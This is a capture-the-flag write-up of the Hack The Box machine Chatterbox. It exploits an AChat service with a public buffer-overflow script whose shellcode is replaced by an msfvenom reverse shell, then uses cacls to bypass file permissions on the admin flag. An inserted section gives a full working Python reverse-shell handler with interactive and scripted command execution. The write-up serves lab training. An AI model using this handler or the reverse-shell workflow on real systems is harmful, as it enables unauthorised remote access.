Hi everyone, I'm back for another Hack The Box write-up ;) I was waiting for the machine to be retired ;)
Today we are talking about the machine called Chatterbox. As the name suggests, it is a box with a chat application running on it.
Without further delay, let's get to it ;)
Enumeration
Let's gather more information about our target ;) I changed my usual approach for this first step: I used Metasploit instead of nmap ;) Why? Because I didn't find any open ports with nmap!
I used the auxiliary/scanner/portscan/tcp module, configured as follows:
Let's run it; it takes a while, but here are the results!
OK, we have only 2 open TCP ports. With this information we are going to dig deeper ;)
1. Port 9255
Let's investigate port 9255 to see what is behind it.
2. Port 9256
Let's investigate port 9256 to see what is behind it.
Nothing interesting so far, except that some application is talking over these ports! That's the weakness hahah ;)
More enumeration
OK, with Hack The Box there is often a hidden meaning ;) I dug deeper and found that an AChat application is running behind these ports.
Here is the public exploit; read it to understand it in depth. It's written in Python.
Exploitation
After reading it carefully, we can see that the shellcode is customised by the attacker for whatever they want to do.
So we are going to replace the shellcode with a reverse shell (generated with msfvenom for the windows/shell_reverse_tcp payload) and fill in the exploit's target IP and remote port. Note that the shellcode itself carries the address it connects back to, so it must be generated with LHOST set to our own machine and LPORT set to the port our handler will listen on. Let's do it.
I used the shellcode above to get a reverse shell.
Ok, let’s configure our handler on Metasploit. It’s also possible with Netcat.
Enter the payload that I put on the exploit.py “ windows/shell_reverse_tcp” then the LPORT 4444 and the ip of the target.
With this in place, let’s run all them in this sequence.
- Run the exploit.py
- Run the handler on Metasploit
BTW, we are in, that’s cool.
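The handler step above (listen first, then fire the exploit, then talk to the shell), as an added example that is not part of the original write-up: a minimal netcat-style reverse-shell handler in Python, the role exploit/multi/handler plays here. The bind address and port 4444 are assumptions taken from the text; fake_victim() is a constructed stand-in for the shell calling back, so the script runs offline. The same listener works against a real callback once fake_victim() is replaced by the exploit.

```python
"""Added example (not the write-up's code): a minimal reverse-shell handler.
Bind address/port are assumptions; fake_victim() is a constructed callback."""
import selectors
import socket
import sys
import threading
from typing import Dict, Optional


def start_handler(bind_addr: str = "0.0.0.0", port: int = 4444) -> socket.socket:
    """Open the listener FIRST: the shellcode connects back to us, and a
    connection to a port nobody listens on is refused, not queued."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    return srv


def wait_for_shell(listener: socket.socket,
                   timeout: Optional[float] = None) -> Optional[socket.socket]:
    """Block until the victim calls back; None if nothing arrives in time
    (exploit fired before the handler was up, wrong LHOST, or it just failed)."""
    listener.settimeout(timeout)
    try:
        conn, peer = listener.accept()
    except socket.timeout:
        return None
    print(f"[+] shell from {peer[0]}:{peer[1]}", file=sys.stderr)
    return conn


def read_until_quiet(conn: socket.socket, quiet: float = 0.5) -> bytes:
    """Collect output until the shell has been silent for `quiet` seconds."""
    conn.settimeout(quiet)
    buf = b""
    while True:
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def run_command(conn: socket.socket, cmd: str, quiet: float = 0.5) -> bytes:
    """Scripted use: send one command line and return whatever comes back."""
    conn.sendall(cmd.encode() + b"\r\n")
    return read_until_quiet(conn, quiet)


def interact(conn: socket.socket) -> None:
    """Interactive use (Unix): relay keyboard -> shell and shell output -> terminal."""
    conn.settimeout(None)
    sel = selectors.DefaultSelector()
    sel.register(conn, selectors.EVENT_READ)
    sel.register(sys.stdin, selectors.EVENT_READ)
    while True:
        for key, _ in sel.select():
            if key.fileobj is conn:
                data = conn.recv(4096)
                if not data:
                    return
                sys.stdout.write(data.decode(errors="replace"))
                sys.stdout.flush()
            else:
                line = sys.stdin.readline()
                if not line:
                    return
                conn.sendall(line.encode())


def fake_victim(port: int, responses: Dict[str, bytes]) -> threading.Thread:
    """Constructed cmd.exe look-alike: connects back, shows a prompt and
    answers each command line from `responses`."""
    prompt = b"C:\\Windows\\system32>"

    def run() -> None:
        with socket.create_connection(("127.0.0.1", port)) as s:
            s.sendall(prompt)
            pending = b""
            while True:
                data = s.recv(1024)
                if not data:
                    return
                pending += data
                while b"\n" in pending:
                    line, pending = pending.split(b"\n", 1)
                    cmd = line.strip().decode(errors="replace")
                    reply = responses.get(cmd, b"'" + cmd.encode() + b"' is not recognized")
                    s.sendall(reply + b"\r\n" + prompt)

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t


def demo() -> Dict[str, bytes]:
    """Listener up first, then the callback, then a scripted command."""
    listener = start_handler("127.0.0.1", 0)  # ephemeral port for the offline demo
    port = listener.getsockname()[1]
    fake_victim(port, {"whoami": b"constructed-host\\lowpriv"})
    conn = wait_for_shell(listener, timeout=5)
    if conn is None:
        raise RuntimeError("no callback received")
    try:
        banner = read_until_quiet(conn, 0.3)
        whoami = run_command(conn, "whoami", 0.3)
    finally:
        conn.close()
        listener.close()
    return {"banner": banner, "whoami": whoami}


if __name__ == "__main__":
    print(demo())
    # Real use: interact(wait_for_shell(start_handler("0.0.0.0", 4444)))
```

wait_for_shell() returning None is the symptom of the ordering mistake (exploit before handler) or of shellcode generated with the wrong LHOST; the scripted run_command() path is handy for the post-exploitation commands below when a raw reverse shell is too unstable for interactive use.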
Post exploitation
This is the last step of the challenge. First, let's grab the user flag.
A handy Windows command shows the OS version together with the installed patches ;) (systeminfo, for example, lists both, including the hotfix IDs.)
OK, we now have the user flag. Let's dig for the ultimate flag, the administrator flag.
Let's try to grab it!
At this point we can't read it! OMG ;) Let's bypass that.
To get around the file permissions, I used the cacls command and changed the ACL on the flag file so that our user can read it (cacls with /E edits the existing ACL instead of replacing it, and /G user:perm grants the given right). This only works because the account we landed in is allowed to change that file's ACL: the owner of a file can always rewrite its permissions, even when the DACL denies them read access.
For more information, read the documentation of the command to understand the bypass.